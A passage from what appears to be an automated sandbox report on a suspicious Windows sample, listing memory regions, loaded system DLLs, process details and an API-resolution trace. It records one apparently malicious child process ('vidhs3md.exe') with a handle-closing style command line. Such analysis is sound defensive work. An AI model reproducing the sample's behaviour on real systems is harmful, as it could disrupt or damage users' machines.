= "private_0x000000007fa2d000" filename = "" Region: id = 9270 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9271 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9272 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 9273 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9274 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9275 start_va = 0x49b0000 end_va = 0x49b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049b0000" filename = "" Region: id = 9279 start_va = 0x49c0000 end_va = 0x49c1fff entry_point = 0x0 region_type = private name = "private_0x00000000049c0000" filename = "" Region: id = 9282 start_va = 0x4ba0000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004ba0000" filename = "" Region: id = 9283 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9284 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9285 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9286 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9287 start_va = 0x49d0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 9288 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9289 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9290 start_va = 0x48d0000 end_va = 0x48dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048d0000" filename = "" Region: id = 9291 start_va = 0x7f900000 end_va = 0x7f9fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f900000" filename = "" Region: id = 9349 start_va = 0x4bb0000 end_va = 0x4c6dfff entry_point = 0x4bb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9350 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9351 start_va = 0x4af0000 end_va = 0x4b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 9352 start_va = 0x4b30000 end_va = 0x4b6ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b30000" filename = "" Region: id = 9353 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9354 start_va = 0x7fa28000 end_va = 0x7fa2afff entry_point = 0x0 region_type = private name = "private_0x000000007fa28000" filename = "" Region: id = 9355 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9356 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9357 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9358 start_va = 0x48e0000 end_va = 0x48e3fff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 9359 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9360 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9361 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9362 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9363 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 9364 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9365 start_va = 0x4c70000 end_va = 0x4d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004c70000" filename = "" Region: id = 9366 start_va = 0x4b70000 end_va = 0x4b99fff entry_point = 0x4b70000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9367 start_va = 0x4da0000 end_va = 0x4f27fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004da0000" filename = "" Region: id = 9368 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9369 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9370 start_va = 0x48f0000 end_va = 0x48f4fff entry_point = 0x48f0000 region_type = mapped_file name = "takeown.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\takeown.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\takeown.exe.mui") Region: id = 9371 start_va = 0x4f30000 end_va = 0x50b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004f30000" filename = "" Region: id = 9372 start_va = 0x50c0000 end_va = 0x64bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000050c0000" filename = "" Region: id = 9373 start_va = 0x49d0000 end_va = 0x49d0fff entry_point = 0x0 region_type = private name = "private_0x00000000049d0000" filename = "" Region: id = 9374 start_va = 0x49e0000 end_va = 0x49e0fff entry_point = 0x0 region_type = private name = "private_0x00000000049e0000" filename = "" Region: id = 9375 start_va = 0x49f0000 end_va = 0x4aeffff entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 9398 start_va = 0x64c0000 end_va = 0x67f6fff entry_point = 0x64c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9399 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9400 start_va = 0x74650000 end_va = 0x74677fff entry_point = 0x74650000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Thread: id = 964 os_tid = 0xbd8 Thread: id = 970 os_tid = 0xe8c Process: id = "133" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x2fd45000" os_pid = "0xd14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "81" os_parent_pid = "0xec4" cmd_line = "vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9308 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9309 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9310 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9311 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9312 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 9313 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 9314 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 9315 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 9316 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 9317 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 9318 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 9319 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 9320 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9321 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 9322 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9323 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 9324 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 9325 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 9376 start_va = 0x230000 end_va = 0x23ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 9377 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 9378 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 9379 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9380 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 9381 start_va = 0x480000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9382 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 9383 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 9384 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9385 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 9401 start_va = 0x240000 end_va = 0x2fdfff entry_point = 0x240000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9402 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 9403 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9404 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9405 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 9406 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 9407 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9408 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 9409 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9410 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9411 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9412 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9413 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 9414 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 9415 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 9416 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 9417 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 9418 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 9419 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 9420 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 9421 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 9422 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 9423 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 9424 start_va = 0x743b0000 end_va = 0x74441fff entry_point = 0x743b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 9425 start_va = 0x745d0000 end_va = 0x745d7fff entry_point = 0x745d0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 9426 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 9427 start_va = 0x5c0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 9444 start_va = 0x480000 end_va = 0x4a9fff entry_point = 0x480000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9445 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 9446 start_va = 0x6c0000 end_va = 0x847fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 9447 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 9448 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 9449 start_va = 0x850000 end_va = 0x9d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 9450 start_va = 0x9e0000 end_va = 0x1ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 9451 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 9452 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9453 start_va = 0x480000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Thread: id = 966 os_tid = 0x9e4 [0293.446] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0293.446] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0293.447] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0293.448] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0293.449] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0293.449] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0293.449] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0293.449] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0293.449] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0293.538] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="FlushFileBuffers") returned 0x751562a0 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="WriteFile") returned 0x75156590 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleCP") returned 0x75156860 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0293.539] GetProcAddress (hModule=0x75130000, lpProcName="IsProcessorFeaturePresent") returned 0x75149680 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="ReadFile") returned 0x751564a0 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="GetStartupInfoW") returned 0x7514a080 [0293.540] GetProcAddress (hModule=0x75130000, lpProcName="UnhandledExceptionFilter") returned 0x751728e0 [0293.540] GetProcAddress (hModule=0x75130000, 